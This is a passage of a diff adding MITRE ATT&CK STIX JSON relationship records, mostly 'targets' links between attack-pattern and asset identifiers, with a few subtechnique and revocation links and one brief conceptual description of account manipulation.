"attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--65d42e15-749b-4f86-86c5-b9f1da1e60c5", + "created": "2023-09-28T21:25:34.304Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:25:34.304Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--65d50680-32e2-4c36-8a6c-7c65236c027b", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--65e0c6ee-772a-4ada-b286-8d0b7cb0df6a", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--65e25631-05de-4ce2-88cc-52f91cfbdaf2", + "created": "2023-10-02T20:18:54.267Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:18:54.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--65f44b6b-3841-4f3b-9df0-c36757cc5dfd", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--66156c11-73fa-4bbb-8195-ec8568d8085e", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--663f27c5-318b-42a0-ba64-955f3bf9b303", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--66506cb1-20d5-4cb2-b301-e4a5d2868567", + "created": "2020-02-11T19:08:51.782Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", + "target_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--66652fda-0ead-41ed-b9bf-6c16d23291a8", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--666b7a01-35df-420c-8f9c-cf2b71d7bffb", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--66738beb-0a33-4d70-baec-8307b5b34f80", + "created": "2023-09-28T20:16:05.975Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:16:05.975Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--66771489-fa3c-4f8d-b532-aa24fcdd852a", + "created": "2024-06-27T09:10:34.779Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:10:34.779Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--667cb20e-fc1a-4063-91f2-e8549b873dc9", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--66932869-44bf-4422-b38c-69c9503d5db4", + "created": "2020-01-14T17:23:25.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--c1a452f3-6499-4c12-b7e9-a6a0a102af76", + "target_ref": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--66a14b24-2f7a-4f25-94f4-41d9467b7102", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--66d041e2-d9e8-46cc-88ee-8e5c1cec8702", + "created": "2023-09-29T17:43:31.956Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:43:31.956Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--66d8f3d7-68e0-48a0-a563-4746922080fc", + "created": "2024-04-09T20:48:46.756Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T20:48:46.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67035d29-72c9-44ee-b1d8-662046dd7db7", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--670f37e1-8de3-441e-bc09-ff95c09ee14d", + "created": "2020-03-16T14:12:48.061Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--670f38bb-86e0-4d19-af5f-44405df5aa93", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67100ab6-b539-4c6c-b20b-2180f67fe4d7", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--671e65ce-fcc3-4d2f-b7ea-dbf61a299dcc", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--672a6762-6706-48b5-8de9-695055b83601", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67326ab2-c865-4997-b787-18f6f7548224", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6749d62f-6222-4e14-bff1-57e0d8842929", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6754195a-99cd-4b45-bafd-4a374ae79bbd", + "created": "2023-09-29T18:02:52.119Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:02:52.119Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6756e9a0-54e1-4643-9b2c-5017dd1294be", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--675797fa-5593-48b4-9365-8f30510b2a32", + "created": "2024-05-22T15:30:02.107Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-22T15:30:02.107Z", + "description": "Asset Mapping Rationale: Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials.", + "relationship_type": "targets", + "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--675df25f-e0e2-4b8c-9bc4-44ead4c80b1a", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--676011dc-7c68-40ac-aec5-cb8d71e66a27", + "created": "2020-03-09T14:09:09.014Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--5ad95aaa-49c1-4784-821d-2e83f47b079b", + "target_ref": "attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67764124-76d7-4ef2-bd44-b1a47efa03de", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6787be39-6fae-48d9-8cb9-e79c8c9379a3", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6795c92f-848f-488e-9c25-d240f99c9b34", + "created": "2023-09-28T21:23:39.333Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:23:39.333Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--679729ee-7b99-46b6-9efa-130a0bf93d1d", + "created": "2024-06-24T19:00:08.650Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-24T19:00:08.650Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67ab2804-3635-4ace-b625-1a13bca8b72e", + "created": "2024-06-26T14:47:40.937Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:47:40.937Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67ab9a08-f977-4716-b60e-d4adf209c1c2", + "created": "2024-06-27T08:50:28.528Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:50:28.528Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67ae8423-c401-4c11-93d3-0454c288d934", + "created": "2023-09-29T16:31:57.421Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:31:57.421Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67b04531-f150-44dc-b4dd-a053aa55f44d", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "target_ref": 